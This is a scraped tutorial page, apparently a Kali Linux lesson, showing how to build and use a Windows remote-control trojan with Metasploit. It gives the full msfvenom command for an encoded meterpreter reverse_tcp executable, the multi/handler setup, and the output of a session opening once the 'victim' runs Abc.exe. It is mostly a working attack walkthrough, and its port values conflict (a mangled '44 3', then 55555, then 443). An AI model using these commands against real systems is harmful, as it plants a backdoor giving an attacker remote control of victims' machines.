Kali Defense 9th Chapter Metasploit of my remote control software

Source: Internet
Author: User
Tags thread

Preparation Tools

1. Kali System IP 10.10.10.131

2, victim system IP 10.10.10.133

Steps:

1. Trojan Control Program

root@kali:~# msfvenom-p windows/meterpreter/reverse_tcp-e x86/shikata_ga_nai-i 5-b ' \x00 ' LHOST=10.10.10.131 LPORT=44 3-f exe > Abc.exe

No platform was selected, choosing Msf::module::P latform::windows from the payload

No Arch selected, selecting Arch:x86 from the payload

Found 1 Compatible encoders

Attempting to encode payload with 5 iterations of X86/shikata_ga_nai

X86/shikata_ga_nai succeeded with size (iteration=0)

X86/shikata_ga_nai succeeded with size 387 (iteration=1)

X86/shikata_ga_nai succeeded with size 414 (iteration=2)

X86/shikata_ga_nai succeeded with size 441 (iteration=3)

X86/shikata_ga_nai succeeded with size 468 (iteration=4)

X86/shikata_ga_nai chosen with final size 468

Payload size:468 bytes

Note: Lhost and Lport are local to their IP, not the victim's IP

2. Start Metasploit by command

root@kali:~# Msfconsole

+-------------------------------------------------------+

| METASPLOIT by Rapid7 |

+---------------------------+---------------------------+

|                           __________________   | |

| ==c (___ (_ () | | | "" "" "" "" "" "| ======[***  |

|  )=\           | | EXPLOIT \ |

| // \\          | |_____________\_______    |

| \ \ | |==[msf >]============\ |

| //     \\        | |______________________\  |

| RECON \ | \(@)(@)(@)(@)(@)(@)(@)/   |

|  //         \\      | *********************    |

+---------------------------+---------------------------+

|        o o O | \'\/\/\/'/         |

|         o O | )======(          |

|       o |  .'        LOOT '. |

| | | ^^ ^^ ^^ ^^ ^^ ^^ ^^ |l___ | /    _|| __   \       |

| | PAYLOAD | ""     \___, | /    (_|| _     \      |

| |________________|__|)    __| |     | __||     _)     | |

| | (@) (@)"""**| (@) (@)**|    (@) |     "       ||       " |

|     = = = = = = = = = = = =  | '--------------'      |

+---------------------------+---------------------------+

Save 45% of your time on large engagements with Metasploit Pro

Learn More on Http://rapid7.com/metasploit

=[Metasploit v4.11.5-2015103001]

+----=[exploits-864 auxiliary-251 post]

+----=[432 payloads-37 encoders-8 Nops]

+----=[free Metasploit Pro Trial:http://r-7.co/trymsp]

3. Using handler module

MSF > Use Exploit/multi/handler

4. View handler Parameters

MSF exploit (handler) > Show options

Module Options (Exploit/multi/handler):

Name Current Setting Required Description

----  ---------------  --------  -----------

Exploit Target:

Id Name

--  ----

0 Wildcard Target

5. Shellcode setting

MSF exploit (handler) > Set Payload windows/meterpreter/reverse_tcp

Payload = Windows/meterpreter/reverse_tcp

MSF exploit (handler) > SHOW

[-] Unknown Command:show.

MSF exploit (handler) > Show options

Module Options (Exploit/multi/handler):

Name Current Setting Required Description

----  ---------------  --------  -----------

Payload Options (WINDOWS/METERPRETER/REVERSE_TCP):

Name Current Setting Required Description

----      ---------------  --------  -----------

Exitfunc process Yes Exit technique (Accepted: ", SEH, Thread, process, none)

Lhost 10.10.10.131 Yes the listen address

Lport 4444 Yes the listen port

Exploit Target:

Id Name

--  ----

0 Wildcard Target

6. Modify the Lhost and Lport ports

MSF exploit (handler) > Set Lhost 10.10.10.131

Lhost = 10.10.10.131

MSF exploit (handler) > Set Lport 55555

Lport = 55555

MSF exploit (handler) > Show options

Module Options (Exploit/multi/handler):

Name Current Setting Required Description

----  ---------------  --------  -----------

Payload Options (WINDOWS/METERPRETER/REVERSE_TCP):

Name Current Setting Required Description

----      ---------------  --------  -----------

Exitfunc process Yes Exit technique (Accepted: ", SEH, Thread, process, none)

Lhost 10.10.10.131 Yes the listen address

Lport 55555 Yes the listen port

7. Execute exploit command

MSF exploit (handler) > Exploit

8. The victim executes the Abc.exe file

9. Verification

[*] Started Reverse Handler on 10.10.10.131:443

[*] Starting the payload handler ...

[*] Sending stage (885806 bytes) to 10.10.10.133

[*] meterpreter session 1 opened  (10.10.10.131:443 ->  10.10.10.133:1049)  at 2015-12-07 23:41:20 +0800

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.